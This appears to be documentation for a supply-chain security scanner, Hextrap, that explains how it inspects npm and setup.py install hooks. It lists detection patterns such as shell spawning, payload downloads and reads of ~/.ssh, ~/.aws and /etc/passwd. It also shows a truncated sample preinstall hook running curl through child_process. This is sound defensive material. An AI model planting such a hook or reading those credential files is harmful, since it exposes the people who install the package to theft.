Install Hook Analysis

The Install Hook Attack Surface

Package managers allow packages to execute arbitrary code during installation. In npm, this happens through preinstall, postinstall, and install scripts defined in package.json. In Python, setup.py runs during pip install and can execute any Python code.

This is the most dangerous moment in the package lifecycle. The code runs with the installing user's full permissions, has network access, can read the filesystem, and executes before the developer has any chance to review the package source.

What Hextrap Scans For

The Phase 2 content analyzer inspects install-time scripts for patterns that indicate malicious intent:

npm Scripts

• child_process imports — spawning shell commands from Node.js
• exec() / execSync() calls with encoded or obfuscated arguments
• Network requests via http, https, or node-fetch in install scripts
• File system operations writing outside the package directory

Python setup.py

• subprocess.Popen() or os.system() calls
• socket imports and network connections
• urllib or requests usage for downloading payloads
• exec() / eval() with encoded arguments
• Reading sensitive files (~/.ssh, ~/.aws, /etc/passwd)

Why This Matters

Install hooks are the primary delivery mechanism for supply chain attacks. Over 90% of malicious packages discovered on npm and PyPI use install hooks to execute their payloads. By analyzing these scripts before allowing installation, Hextrap blocks the most common attack vector.

Legitimate packages do use install hooks — for native compilation, binary downloads, or post-install setup. The analyzer distinguishes between these benign uses and suspicious patterns like encoded commands, credential access, and external network calls to unknown hosts.

// package.json
{
  "scripts": {
    "preinstall": "node -e \"require(
      'child_process').exec('curl ...')\""
  }
}

ERROR: Package blocked by Hextrap
Signal: INSTALL_HOOK (HIGH)